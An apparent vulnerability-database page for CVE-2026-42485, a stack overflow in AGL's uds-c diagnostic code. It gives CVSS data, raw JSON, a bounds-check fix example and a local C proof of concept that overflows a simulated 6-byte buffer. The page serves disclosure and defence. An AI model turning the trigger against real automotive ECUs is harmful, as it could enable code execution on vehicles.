Security Vulnerability Report
CVE-2026-42485 CVSS 7.5 HIGH

CVE-2026-42485

Published: 2026-05-01 17:16:25
Last Modified: 2026-05-05 20:24:05

Description

AGL agl-service-can-low-level contains a stack buffer overflow in the uds-c library. The send_diagnostic_request function in uds.c allocates a 6-byte stack buffer (MAX_DIAGNOSTIC_PAYLOAD_SIZE=6) but copies up to 7 bytes (MAX_UDS_REQUEST_PAYLOAD_LENGTH=7) via memcpy at an offset of 1+pid_length (2-3 bytes), resulting in 1-4 bytes of controlled stack overflow. The payload_length field (uint8_t) has no bounds check against the destination buffer. On 32-bit ARM automotive ECUs without stack canaries, this can lead to return address overwrite and RCE.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

AGL agl-service-can-low-level (specific version not mentioned in the description)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-42485
 * This code demonstrates the stack buffer overflow logic.
 * Vulnerability: unchecked payload_length in memcpy.
 */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

// Constants from the vulnerable source
#define MAX_DIAGNOSTIC_PAYLOAD_SIZE 6
#define MAX_UDS_REQUEST_PAYLOAD_LENGTH 7

// Simulated vulnerable function
void vulnerable_send_diagnostic_request(uint8_t *data, uint8_t pid_length, uint8_t payload_length)
{
    // Stack buffer allocation
    uint8_t stack_buf[MAX_DIAGNOSTIC_PAYLOAD_SIZE];

    // Calculate offset: 1 + pid_length (2-3 bytes)
    size_t offset = 1 + pid_length;

    printf("[+] Buffer Address: %p\n", (void *)stack_buf);
    printf("[+] Writing to Offset: %zu\n", offset);
    printf("[+] Payload Length: %d\n", payload_length);

    // VULNERABILITY: No bounds check on payload_length against buffer size - offset
    // If offset is 3 and payload_length is 7, we write 7 bytes to buffer+3.
    // Total write touches indices 3 to 9. Buffer size is 6 (indices 0 to 5).
    // This results in a 4-byte overflow.
    memcpy(stack_buf + offset, data, payload_length);
}

int main(void)
{
    printf("=== CVE-2026-42485 PoC Trigger ===\n");

    // Malicious input data
    uint8_t exploit_data[MAX_UDS_REQUEST_PAYLOAD_LENGTH];
    memset(exploit_data, 0x41, sizeof(exploit_data)); // 'A'

    // Trigger conditions: pid_length=2 (offset=3), payload_length=7
    // This causes the overflow described in the CVE.
    vulnerable_send_diagnostic_request(exploit_data, 2, 7);

    printf("[+] Exploit payload sent. Stack corruption occurred.\n");
    return 0;
}
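
The missing check, as an added example (not code from uds-c, AGL, or the PoC above): the copy is allowed only when payload_length fits in the space left after the 1+pid_length offset. The function names, the status enum and the mode/PID byte layout are assumptions; the two size constants come from the description.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_DIAGNOSTIC_PAYLOAD_SIZE    6  /* destination size (from the advisory) */
#define MAX_UDS_REQUEST_PAYLOAD_LENGTH 7  /* max request payload (from the advisory) */

typedef enum { PACK_OK = 0, PACK_BAD_PID_LENGTH, PACK_TOO_LONG } pack_status;

/* Largest payload that fits after the mode byte and PID; 0 if pid_length is invalid. */
size_t max_payload_for(uint8_t pid_length)
{
    if (pid_length < 1 || pid_length > 2)
        return 0;
    return MAX_DIAGNOSTIC_PAYLOAD_SIZE - (1u + pid_length);   /* 4 or 3 bytes */
}

/* Hypothetical helper: packs [mode][pid][payload] into dest (assumed layout).
 * On any error dest is left untouched. */
pack_status pack_request(uint8_t *dest, size_t dest_size, uint8_t mode,
                         uint16_t pid, uint8_t pid_length,
                         const uint8_t *payload, uint8_t payload_length,
                         size_t *out_len)
{
    if (pid_length < 1 || pid_length > 2)
        return PACK_BAD_PID_LENGTH;
    size_t offset = 1u + pid_length;
    /* Check against the space left after the offset; subtraction form cannot wrap. */
    if (offset > dest_size || payload_length > dest_size - offset)
        return PACK_TOO_LONG;
    dest[0] = mode;
    for (uint8_t i = 0; i < pid_length; i++)   /* big-endian PID bytes */
        dest[1 + i] = (uint8_t)(pid >> (8 * (pid_length - 1 - i)));
    if (payload_length > 0)
        memcpy(dest + offset, payload, payload_length);
    *out_len = offset + payload_length;
    return PACK_OK;
}

int main(void)
{
    uint8_t buf[MAX_DIAGNOSTIC_PAYLOAD_SIZE] = {0};
    uint8_t data[MAX_UDS_REQUEST_PAYLOAD_LENGTH];   /* constructed sample input */
    size_t n = 0;
    memset(data, 0x41, sizeof data);
    /* Same parameters as the overflow case: rejected instead of copied. */
    pack_status s = pack_request(buf, sizeof buf, 0x22, 0x1234, 2, data, 7, &n);
    printf("7-byte payload after 2-byte PID -> status %d\n", (int)s);
    return s == PACK_TOO_LONG ? 0 : 1;
}
```

With a 6-byte destination the usable payload is 3 or 4 bytes depending on the PID length, so any caller that accepts the 7-byte maximum must either enlarge the buffer or reject the request.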

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42485", "sourceIdentifier": "[email protected]", "published": "2026-05-01T17:16:25.377", "lastModified": "2026-05-05T20:24:04.853", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AGL agl-service-can-low-level contains a stack buffer overflow in the uds-c library. The send_diagnostic_request function in uds.c allocates a 6-byte stack buffer (MAX_DIAGNOSTIC_PAYLOAD_SIZE=6) but copies up to 7 bytes (MAX_UDS_REQUEST_PAYLOAD_LENGTH=7) via memcpy at an offset of 1+pid_length (2-3 bytes), resulting in 1-4 bytes of controlled stack overflow. The payload_length field (uint8_t) has no bounds check against the destination buffer. On 32-bit ARM automotive ECUs without stack canaries, this can lead to return address overwrite and RCE."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://gerrit.automotivelinux.org/gerrit/apps/agl-service-can-low-level", "source": "[email protected]"}, {"url": "https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643", "source": "[email protected]"}]}}